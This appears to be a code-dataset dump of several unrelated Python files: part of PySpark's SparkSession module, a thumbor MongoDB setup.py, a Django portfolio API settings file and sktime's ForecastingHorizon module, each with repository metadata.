return [r.astype(record_dtype).tolist() for r in np_records]
# Convert list of numpy records to python lists
return [r.tolist() for r in np_records]
def _create_from_pandas_with_arrow(self, pdf, schema, timezone):
from pyspark.serializers import ArrowStreamPandasSerializer
from pyspark.sql.types import from_arrow_type, to_arrow_type, TimestampType
from pyspark.sql.utils import require_minimum_pandas_version, \
require_minimum_pyarrow_version
require_minimum_pandas_version()
require_minimum_pyarrow_version()
from pandas.api.types import is_datetime64_dtype, is_datetime64tz_dtype
import pyarrow as pa
# Create the Spark schema from list of names passed in with Arrow types
if isinstance(schema, (list, tuple)):
arrow_schema = pa.Schema.from_pandas(pdf, preserve_index=False)
struct = StructType()
for name, field in zip(schema, arrow_schema):
struct.add(name, from_arrow_type(field.type), nullable=field.nullable)
schema = struct
# Determine arrow types to coerce data when creating batches
if isinstance(schema, StructType):
arrow_types = [to_arrow_type(f.dataType) for f in schema.fields]
elif isinstance(schema, DataType):
raise ValueError("Single data type %s is not supported with Arrow" % str(schema))
else:
# Any timestamps must be coerced to be compatible with Spark
arrow_types = [to_arrow_type(TimestampType())
if is_datetime64_dtype(t) or is_datetime64tz_dtype(t) else None
for t in pdf.dtypes]
# Slice the DataFrame to be batched
step = -(-len(pdf) // self.sparkContext.defaultParallelism) # round int up
pdf_slices = (pdf[start:start + step] for start in xrange(0, len(pdf), step))
# Create list of Arrow (columns, type) for serializer dump_stream
arrow_data = [[(c, t) for (_, c), t in zip(pdf_slice.iteritems(), arrow_types)]
for pdf_slice in pdf_slices]
jsqlContext = self._wrapped._jsqlContext
safecheck = self._wrapped._conf.arrowSafeTypeConversion()
col_by_name = True # col by name only applies to StructType columns, can't happen here
ser = ArrowStreamPandasSerializer(timezone, safecheck, col_by_name)
def reader_func(temp_filename):
return self._jvm.PythonSQLUtils.readArrowStreamFromFile(jsqlContext, temp_filename)
def create_RDD_server():
return self._jvm.ArrowRDDServer(jsqlContext)
jrdd = self._sc._serialize_to_jvm(arrow_data, ser, reader_func, create_RDD_server)
jdf = self._jvm.PythonSQLUtils.toDataFrame(jrdd, schema.json(), jsqlContext)
df = DataFrame(jdf, self._wrapped)
df._schema = schema
return df
@staticmethod
def _create_shell_session():
import py4j
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
try:
conf = SparkConf()
if conf.get('spark.sql.catalogImplementation', 'hive').lower() == 'hive':
SparkContext._jvm.org.apache.hadoop.hive.conf.HiveConf()
return SparkSession.builder\
.enableHiveSupport()\
.getOrCreate()
else:
return SparkSession.builder.getOrCreate()
except (py4j.protocol.Py4JError, TypeError):
if conf.get('spark.sql.catalogImplementation', '').lower() == 'hive':
warnings.warn("Fall back to non-hive support because failing to access HiveConf, "
"please make sure you build spark with hive")
return SparkSession.builder.getOrCreate()
@since(2.0)
@ignore_unicode_prefix
def createDataFrame(self, data, schema=None, samplingRatio=None, verifySchema=True):
SparkSession._activeSession = self
self._jvm.SparkSession.setActiveSession(self._jsparkSession)
if isinstance(data, DataFrame):
raise TypeError("data is already a DataFrame")
if isinstance(schema, basestring):
schema = _parse_datatype_string(schema)
elif isinstance(schema, (list, tuple)):
schema = [x.encode('utf-8') if not isinstance(x, str) else x for x in schema]
try:
import pandas
has_pandas = True
except Exception:
has_pandas = False
if has_pandas and isinstance(data, pandas.DataFrame):
from pyspark.sql.utils import require_minimum_pandas_version
require_minimum_pandas_version()
if self._wrapped._conf.pandasRespectSessionTimeZone():
timezone = self._wrapped._conf.sessionLocalTimeZone()
else:
timezone = None
if schema is None:
schema = [str(x) if not isinstance(x, basestring) else
(x.encode('utf-8') if not isinstance(x, str) else x)
for x in data.columns]
if self._wrapped._conf.arrowPySparkEnabled() and len(data) > 0:
try:
return self._create_from_pandas_with_arrow(data, schema, timezone)
except Exception as e:
from pyspark.util import _exception_message
if self._wrapped._conf.arrowPySparkFallbackEnabled():
msg = (
"createDataFrame attempted Arrow optimization because "
"'spark.sql.execution.arrow.pyspark.enabled' is set to true; however, "
"failed by the reason below:\n %s\n"
"Attempting non-optimization as "
"'spark.sql.execution.arrow.pyspark.fallback.enabled' is set to "
"true." % _exception_message(e))
warnings.warn(msg)
else:
msg = (
"createDataFrame attempted Arrow optimization because "
"'spark.sql.execution.arrow.pyspark.enabled' is set to true, but has "
"reached the error below and will not continue because automatic "
"fallback with 'spark.sql.execution.arrow.pyspark.fallback.enabled' "
"has been set to false.\n %s" % _exception_message(e))
warnings.warn(msg)
raise
data = self._convert_from_pandas(data, schema, timezone)
if isinstance(schema, StructType):
verify_func = _make_type_verifier(schema) if verifySchema else lambda _: True
def prepare(obj):
verify_func(obj)
return obj
elif isinstance(schema, DataType):
dataType = schema
schema = StructType().add("value", schema)
verify_func = _make_type_verifier(
dataType, name="field value") if verifySchema else lambda _: True
def prepare(obj):
verify_func(obj)
return obj,
else:
prepare = lambda obj: obj
if isinstance(data, RDD):
rdd, schema = self._createFromRDD(data.map(prepare), schema, samplingRatio)
else:
rdd, schema = self._createFromLocal(map(prepare, data), schema)
jrdd = self._jvm.SerDeUtil.toJavaArray(rdd._to_java_object_rdd())
jdf = self._jsparkSession.applySchemaToPythonRDD(jrdd.rdd(), schema.json())
df = DataFrame(jdf, self._wrapped)
df._schema = schema
return df
@ignore_unicode_prefix
@since(2.0)
def sql(self, sqlQuery):
return DataFrame(self._jsparkSession.sql(sqlQuery), self._wrapped)
@since(2.0)
def table(self, tableName):
return DataFrame(self._jsparkSession.table(tableName), self._wrapped)
@property
@since(2.0)
def read(self):
return DataFrameReader(self._wrapped)
@property
@since(2.0)
def readStream(self):
return DataStreamReader(self._wrapped)
@property
@since(2.0)
def streams(self):
from pyspark.sql.streaming import StreamingQueryManager
return StreamingQueryManager(self._jsparkSession.streams())
@since(2.0)
def stop(self):
self._sc.stop()
self._jvm.SparkSession.clearDefaultSession()
self._jvm.SparkSession.clearActiveSession()
SparkSession._instantiatedSession = None
SparkSession._activeSession = None
@since(2.0)
def __enter__(self):
return self
@since(2.0)
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def _test():
import os
import doctest
from pyspark.context import SparkContext
from pyspark.sql import Row
import pyspark.sql.session
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.sql.session.__dict__.copy()
sc = SparkContext('local[4]', 'PythonTest')
globs['sc'] = sc
globs['spark'] = SparkSession(sc)
globs['rdd'] = rdd = sc.parallelize(
[Row(field1=1, field2="row1"),
Row(field1=2, field2="row2"),
Row(field1=3, field2="row3")])
globs['df'] = rdd.toDF()
(failure_count, test_count) = doctest.testmod(
pyspark.sql.session, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| true | true |
1c3c78ab9027a81c10ad54d82ba3a67d27d777c0 | 976 | py | Python | setup.py | allanlei/tc-mongodb | 28d09245fe81762cf4c1ba9d054f9a2a38735c6d | [
"MIT"
] | 5 | 2016-08-31T04:15:31.000Z | 2018-11-02T19:33:22.000Z | setup.py | allanlei/tc-mongodb | 28d09245fe81762cf4c1ba9d054f9a2a38735c6d | [
"MIT"
] | 3 | 2018-09-13T13:55:14.000Z | 2022-01-23T20:52:02.000Z | setup.py | allanlei/tc-mongodb | 28d09245fe81762cf4c1ba9d054f9a2a38735c6d | [
"MIT"
] | 7 | 2016-08-31T04:15:42.000Z | 2019-02-12T07:42:39.000Z | import os
from setuptools import setup, find_packages
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
long_description = 'Thumbor mongodb storage adapters'
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="tc_mongodb",
version="5.1.0",
author="Thumbor Community",
description=("Thumbor thumbor storage adapters"),
license="MIT",
keywords="thumbor mongodb mongo",
url="https://github.com/thumbor-community/mongodb",
packages=[
'tc_mongodb',
'tc_mongodb.storages',
'tc_mongodb.result_storages'
],
long_description=long_description,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
],
install_requires=[
'thumbor>=5.0.0',
'pymongo'
]
)
| 25.025641 | 70 | 0.645492 | import os
from setuptools import setup, find_packages
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
long_description = 'Thumbor mongodb storage adapters'
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="tc_mongodb",
version="5.1.0",
author="Thumbor Community",
description=("Thumbor thumbor storage adapters"),
license="MIT",
keywords="thumbor mongodb mongo",
url="https://github.com/thumbor-community/mongodb",
packages=[
'tc_mongodb',
'tc_mongodb.storages',
'tc_mongodb.result_storages'
],
long_description=long_description,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
],
install_requires=[
'thumbor>=5.0.0',
'pymongo'
]
)
| true | true |
1c3c793af2a546c2660b89498cfa597007dc82f5 | 3,406 | py | Python | portfolio_api/settings.py | rafsaf/rest_api_for_portfolio | 2b07aca65cbe2d81f3f862fd024a2e0c5f20c83f | [
"MIT"
] | null | null | null | portfolio_api/settings.py | rafsaf/rest_api_for_portfolio | 2b07aca65cbe2d81f3f862fd024a2e0c5f20c83f | [
"MIT"
] | null | null | null | portfolio_api/settings.py | rafsaf/rest_api_for_portfolio | 2b07aca65cbe2d81f3f862fd024a2e0c5f20c83f | [
"MIT"
] | null | null | null | """
Django settings for portfolio_api project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '1+&12121212ttt5SSASda232fd8s8ad7sda8*l_5)mmnz*m7lak_gj345u2svsu+jw)mf)tf^8%oei_o=)8k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['rafsaf1.eu.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'projects',
'rest_framework',
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ALLOWED_ORIGINS = [
"http://localhost:3000",
]
ROOT_URLCONF = 'portfolio_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'Europe/Warsaw'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_ROOT = BASE_DIR / 'static/'
STATIC_URL = '/static/'
MEDIA_ROOT = BASE_DIR / 'media/'
MEDIA_URL = '/media/'
| 25.609023 | 99 | 0.701116 |
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = '1+&12121212ttt5SSASda232fd8s8ad7sda8*l_5)mmnz*m7lak_gj345u2svsu+jw)mf)tf^8%oei_o=)8k'
DEBUG = False
ALLOWED_HOSTS = ['rafsaf1.eu.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'projects',
'rest_framework',
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ALLOWED_ORIGINS = [
"http://localhost:3000",
]
ROOT_URLCONF = 'portfolio_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'Europe/Warsaw'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_ROOT = BASE_DIR / 'static/'
STATIC_URL = '/static/'
MEDIA_ROOT = BASE_DIR / 'media/'
MEDIA_URL = '/media/'
| true | true |
1c3c7ae12764bbeb2b2498e4516c89ae1557bf09 | 17,526 | py | Python | sktime/forecasting/base/_fh.py | bilal-196/sktime | 87e92e51f9c4cd399d9438c5c06e1364ec409134 | [
"BSD-3-Clause"
] | null | null | null | sktime/forecasting/base/_fh.py | bilal-196/sktime | 87e92e51f9c4cd399d9438c5c06e1364ec409134 | [
"BSD-3-Clause"
] | null | null | null | sktime/forecasting/base/_fh.py | bilal-196/sktime | 87e92e51f9c4cd399d9438c5c06e1364ec409134 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
__author__ = ["mloning", "fkiraly"]
__all__ = ["ForecastingHorizon"]
from functools import lru_cache
import numpy as np
import pandas as pd
from sktime.utils.datetime import _coerce_duration_to_int
from sktime.utils.datetime import _get_freq
from sktime.utils.validation.series import VALID_INDEX_TYPES
RELATIVE_TYPES = (pd.Int64Index, pd.RangeIndex)
ABSOLUTE_TYPES = (pd.Int64Index, pd.RangeIndex, pd.DatetimeIndex, pd.PeriodIndex)
assert set(RELATIVE_TYPES).issubset(VALID_INDEX_TYPES)
assert set(ABSOLUTE_TYPES).issubset(VALID_INDEX_TYPES)
DELEGATED_METHODS = (
"__sub__",
"__add__",
"__mul__",
"__div__",
"__divmod__",
"__pow__",
"__gt__",
"__ge__",
"__ne__",
"__lt__",
"__eq__",
"__le__",
"__radd__",
"__rsub__",
"__rmul__",
"__rdiv__",
"__rmod__",
"__rdivmod__",
"__rpow__",
"__getitem__",
"__len__",
"max",
"min",
)
def _delegator(method):
"""Decorate ForecastingHorizon with pandas.index methods.
Helper function to automatically decorate ForecastingHorizon class with
methods from pandas.Index and delegate method calls to wrapped pandas.Index
object.
"""
def delegated(obj, *args, **kwargs):
return getattr(obj.to_pandas(), method)(*args, **kwargs)
return delegated
def _check_values(values):
"""Validate forecasting horizon values and coerce to pandas.Index type.
Parameters
----------
values : int, list, array, certain pd.Index types
Forecasting horizon with steps ahead to predict.
Raises
------
TypeError : if values type is not supported
Returns
-------
values : pd.Index
Sorted and validated forecasting horizon values.
"""
# if values are one of the supported pandas index types, we don't have
# to do
# anything as the forecasting horizon directly wraps the index, note that
# isinstance() does not work here, because index types inherit from each
# other,
# hence we check for type equality here
if type(values) in VALID_INDEX_TYPES:
pass
# convert single integer to pandas index, no further checks needed
elif isinstance(values, (int, np.integer)):
return pd.Int64Index([values], dtype=np.int)
# convert np.array or list to pandas index
elif isinstance(values, (list, np.ndarray)):
values = pd.Int64Index(values, dtype=np.int)
# otherwise, raise type error
else:
valid_types = (
"int",
"np.array",
"list",
*[f"pd.{index_type.__name__}" for index_type in VALID_INDEX_TYPES],
)
raise TypeError(
f"Invalid `fh`. The type of the passed `fh` values is not supported. "
f"Please use one of {valid_types}, but found: {type(values)}"
)
# check values does not contain duplicates
if len(values) != values.nunique():
raise ValueError(
"Invalid `fh`. The `fh` values must not contain any duplicates."
)
# return sorted values
return values.sort_values()
class ForecastingHorizon:
"""Forecasting horizon.
Parameters
----------
values : pd.Index, np.array, list or int
Values of forecasting horizon
is_relative : bool, optional (default=None)
- If True, a relative ForecastingHorizon is created:
values are relative to end of training series.
- If False, an absolute ForecastingHorizon is created:
values are absolute.
- if None, the flag is determined automatically:
relative, if values are of supported relative index type
absolute, if not relative and values of supported absolute index type
"""
def __new__(cls, values=None, is_relative=None):
"""Create a new ForecastingHorizon object."""
# We want the ForecastingHorizon class to be an extension of the
# pandas index, but since subclassing pandas indices is not
# straightforward, we wrap the index object instead. In order to
# still support the basic methods of a pandas index, we dynamically
# add some basic methods and delegate the method calls to the wrapped
# index object.
for method in DELEGATED_METHODS:
setattr(cls, method, _delegator(method))
return object.__new__(cls)
def __init__(self, values=None, is_relative=True):
if is_relative is not None and not isinstance(is_relative, bool):
raise TypeError("`is_relative` must be a boolean or None")
values = _check_values(values)
# check types, note that isinstance() does not work here because index
# types inherit from each other, hence we check for type equality
error_msg = (
f"`values` type is not compatible with `is_relative=" f"{is_relative}`."
)
if is_relative is None:
if type(values) in RELATIVE_TYPES:
is_relative = True
elif type(values) in ABSOLUTE_TYPES:
is_relative = False
else:
raise TypeError(type(values) + "is not a supported fh index type")
if is_relative:
if not type(values) in RELATIVE_TYPES:
raise TypeError(error_msg)
else:
if not type(values) in ABSOLUTE_TYPES:
raise TypeError(error_msg)
self._values = values
self._is_relative = is_relative
def _new(self, values=None, is_relative=None):
"""Construct new ForecastingHorizon based on current object.
Parameters
----------
values : pd.Index, np.array, list or int
Values of forecasting horizon
is_relative : bool, optional (default=same as self.is_relative)
- If None, determined automatically: same as self.is_relative
- If True, values are relative to end of training series.
- If False, values are absolute.
Returns
-------
ForecastingHorizon
New ForecastingHorizon based on current object
"""
if values is None:
values = self._values
if is_relative is None:
is_relative = self.is_relative
return type(self)(values, is_relative)
@property
def is_relative(self):
"""Whether forecasting horizon is relative.
Returns
-------
is_relative : bool
"""
return self._is_relative
def to_pandas(self):
"""Return underlying values as pd.Index.
Returns
-------
fh : pd.Index
"""
return self._values
def to_numpy(self, **kwargs):
"""Return underlying values as np.array.
Parameters
----------
**kwargs : dict of kwargs
kwargs passed to `to_numpy()` of wrapped pandas index.
Returns
-------
fh : np.ndarray
"""
return self.to_pandas().to_numpy(**kwargs)
# We cache the results from `to_relative()` and `to_absolute()` calls to speed up
# computations, as these are the basic methods and often required internally when
# calling different methods.
@lru_cache(typed=True)
def to_relative(self, cutoff=None):
"""Return relative values.
Parameters
----------
cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
Returns
-------
fh : ForecastingHorizon
Relative representation of forecasting horizon
"""
if self.is_relative:
return self._new()
else:
absolute = self.to_pandas()
_check_cutoff(cutoff, absolute)
if isinstance(absolute, pd.DatetimeIndex):
# We cannot use the freq from the the ForecastingHorizon itself (or its
# wrapped pd.DatetimeIndex) because it may be none for non-regular
# indices, so instead we use the freq of cutoff.
freq = _get_freq(cutoff)
# coerce to pd.Period for reliable arithmetics and computations of
# time deltas
absolute = _coerce_to_period(absolute, freq)
cutoff = _coerce_to_period(cutoff, freq)
# Compute relative values
relative = absolute - cutoff
# Coerce durations (time deltas) into integer values for given frequency
if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
relative = _coerce_duration_to_int(relative, freq=_get_freq(cutoff))
return self._new(relative, is_relative=True)
@lru_cache(typed=True)
def to_absolute(self, cutoff):
"""Convert ForecastingHorizon to absolute and return.
Parameters
----------
cutoff : pd.Period, pd.Timestamp, int
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
Returns
-------
fh : ForecastingHorizon
Absolute representation of forecasting horizon
"""
if not self.is_relative:
return self._new()
else:
relative = self.to_pandas()
_check_cutoff(cutoff, relative)
is_timestamp = isinstance(cutoff, pd.Timestamp)
if is_timestamp:
# coerce to pd.Period for reliable arithmetic operations and
# computations of time deltas
cutoff = _coerce_to_period(cutoff)
absolute = cutoff + relative
if is_timestamp:
# coerce back to DatetimeIndex after operation
freq = _get_freq(cutoff)
absolute = absolute.to_timestamp(freq)
return self._new(absolute, is_relative=False)
def to_absolute_int(self, start, cutoff=None):
"""Return absolute values as zero-based integer index starting from `start`.
Parameters
----------
start : pd.Period, pd.Timestamp, int
Start value returned as zero.
cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
Returns
-------
fh : ForecastingHorizon
Absolute representation of forecasting horizon as zero-based
integer index
"""
# We here check the start value, the cutoff value is checked when we use it
# to convert the horizon to the absolute representation below
absolute = self.to_absolute(cutoff).to_pandas()
_check_start(start, absolute)
# Note: We should here also coerce to periods for more reliable arithmetic
# operations as in `to_relative` but currently doesn't work with
# `update_predict` and incomplete time indices where the `freq` information
# is lost, see comment on issue #534
integers = absolute - start
if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
integers = _coerce_duration_to_int(integers, freq=_get_freq(cutoff))
return self._new(integers, is_relative=False)
def to_in_sample(self, cutoff=None):
"""Return in-sample index values of fh.
Parameters
----------
cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
Returns
-------
fh : ForecastingHorizon
In-sample values of forecasting horizon
"""
is_in_sample = self._is_in_sample(cutoff)
in_sample = self.to_pandas()[is_in_sample]
return self._new(in_sample)
def to_out_of_sample(self, cutoff=None):
"""Return out-of-sample values of fh.
Parameters
----------
cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
Returns
-------
fh : ForecastingHorizon
Out-of-sample values of forecasting horizon
"""
is_out_of_sample = self._is_out_of_sample(cutoff)
out_of_sample = self.to_pandas()[is_out_of_sample]
return self._new(out_of_sample)
def _is_in_sample(self, cutoff=None):
"""Get index location of in-sample values."""
return self.to_relative(cutoff).to_pandas() <= 0
def is_all_in_sample(self, cutoff=None):
"""Whether or not the fh is purely in-sample given cutoff, yes/no.
Parameters
----------
cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
Returns
-------
ret : bool
True if the forecasting horizon is purely in-sample for given cutoff.
"""
return sum(self._is_in_sample(cutoff)) == len(self)
def _is_out_of_sample(self, cutoff=None):
"""Get index location of out-of-sample values."""
# return ~self._in_sample_idx(cutoff)
return self.to_relative(cutoff).to_pandas() > 0
def is_all_out_of_sample(self, cutoff=None):
"""Whether or not the fh is purely out-of-sample given cutoff, yes/no.
Parameters
----------
cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
Returns
-------
ret : bool
True if the forecasting horizon is purely out-of-sample for given
cutoff.
"""
return sum(self._is_out_of_sample(cutoff)) == len(self)
def to_indexer(self, cutoff=None, from_cutoff=True):
"""Return zero-based indexer values for easy indexing into arrays.
Parameters
----------
cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
Cutoff value is required to convert a relative forecasting
horizon to an absolute one and vice versa.
from_cutoff : bool, optional (default=True)
- If True, zero-based relative to cutoff.
- If False, zero-based relative to first value in forecasting
horizon.
Returns
-------
fh : pd.Index
Indexer
"""
if from_cutoff:
return self.to_relative(cutoff).to_pandas() - 1
else:
relative = self.to_relative(cutoff)
return relative - relative.to_pandas()[0]
def __repr__(self):
"""Generate repr based on wrapped index repr."""
class_name = self.__class__.__name__
pandas_repr = repr(self.to_pandas()).split("(")[-1].strip(")")
return f"{class_name}({pandas_repr}, is_relative={self.is_relative})"
def _check_cutoff(cutoff, index):
"""Check whether cutoff is compatible with fh index type.
Helper function to check if the cutoff contains all necessary information and is
compatible with the time index of the forecasting horizon
"""
if cutoff is None:
raise ValueError("`cutoff` must be given, but found none.")
if isinstance(index, pd.PeriodIndex):
assert isinstance(cutoff, pd.Period)
assert index.freqstr == cutoff.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(cutoff, pd.Timestamp)
if not hasattr(cutoff, "freqstr") or cutoff.freqstr is None:
raise AttributeError(
"The `freq` attribute of the time index is required, "
"but found: None. Please specify the `freq` argument "
"when setting the time index."
)
# For indices of type DatetimeIndex with irregular steps, frequency will be
# None
if index.freqstr is not None:
assert cutoff.freqstr == index.freqstr
def _check_start(start, index):
if isinstance(index, pd.PeriodIndex):
assert isinstance(start, pd.Period)
assert index.freqstr == start.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(start, pd.Timestamp)
def _coerce_to_period(x, freq=None):
"""Coerce compatible index type to pd.PeriodIndex.
Helper function to coerce pd.Timestamp to pd.Period or pd.DatetimeIndex to
pd.PeriodIndex for more reliable arithmetic operations with time indices
"""
if freq is None:
freq = _get_freq(x)
try:
return x.to_period(freq)
except (ValueError, AttributeError) as e:
msg = str(e)
if "Invalid frequency" in msg or "_period_dtype_code" in msg:
raise ValueError(
"Invalid frequency. Please select a frequency that can "
"be converted to a regular `pd.PeriodIndex`. For other "
"frequencies, basic arithmetic operation to compute "
"durations currently do not work reliably."
)
else:
raise
| 34.097276 | 87 | 0.618966 |
__author__ = ["mloning", "fkiraly"]
__all__ = ["ForecastingHorizon"]
from functools import lru_cache
import numpy as np
import pandas as pd
from sktime.utils.datetime import _coerce_duration_to_int
from sktime.utils.datetime import _get_freq
from sktime.utils.validation.series import VALID_INDEX_TYPES
RELATIVE_TYPES = (pd.Int64Index, pd.RangeIndex)
ABSOLUTE_TYPES = (pd.Int64Index, pd.RangeIndex, pd.DatetimeIndex, pd.PeriodIndex)
assert set(RELATIVE_TYPES).issubset(VALID_INDEX_TYPES)
assert set(ABSOLUTE_TYPES).issubset(VALID_INDEX_TYPES)
DELEGATED_METHODS = (
"__sub__",
"__add__",
"__mul__",
"__div__",
"__divmod__",
"__pow__",
"__gt__",
"__ge__",
"__ne__",
"__lt__",
"__eq__",
"__le__",
"__radd__",
"__rsub__",
"__rmul__",
"__rdiv__",
"__rmod__",
"__rdivmod__",
"__rpow__",
"__getitem__",
"__len__",
"max",
"min",
)
def _delegator(method):
def delegated(obj, *args, **kwargs):
return getattr(obj.to_pandas(), method)(*args, **kwargs)
return delegated
def _check_values(values):
# to do
# anything as the forecasting horizon directly wraps the index, note that
# isinstance() does not work here, because index types inherit from each
# other,
# hence we check for type equality here
if type(values) in VALID_INDEX_TYPES:
pass
# convert single integer to pandas index, no further checks needed
elif isinstance(values, (int, np.integer)):
return pd.Int64Index([values], dtype=np.int)
# convert np.array or list to pandas index
elif isinstance(values, (list, np.ndarray)):
values = pd.Int64Index(values, dtype=np.int)
# otherwise, raise type error
else:
valid_types = (
"int",
"np.array",
"list",
*[f"pd.{index_type.__name__}" for index_type in VALID_INDEX_TYPES],
)
raise TypeError(
f"Invalid `fh`. The type of the passed `fh` values is not supported. "
f"Please use one of {valid_types}, but found: {type(values)}"
)
# check values does not contain duplicates
if len(values) != values.nunique():
raise ValueError(
"Invalid `fh`. The `fh` values must not contain any duplicates."
)
# return sorted values
return values.sort_values()
class ForecastingHorizon:
def __new__(cls, values=None, is_relative=None):
# We want the ForecastingHorizon class to be an extension of the
# pandas index, but since subclassing pandas indices is not
# straightforward, we wrap the index object instead. In order to
# still support the basic methods of a pandas index, we dynamically
# add some basic methods and delegate the method calls to the wrapped
# index object.
for method in DELEGATED_METHODS:
setattr(cls, method, _delegator(method))
return object.__new__(cls)
def __init__(self, values=None, is_relative=True):
if is_relative is not None and not isinstance(is_relative, bool):
raise TypeError("`is_relative` must be a boolean or None")
values = _check_values(values)
# check types, note that isinstance() does not work here because index
# types inherit from each other, hence we check for type equality
error_msg = (
f"`values` type is not compatible with `is_relative=" f"{is_relative}`."
)
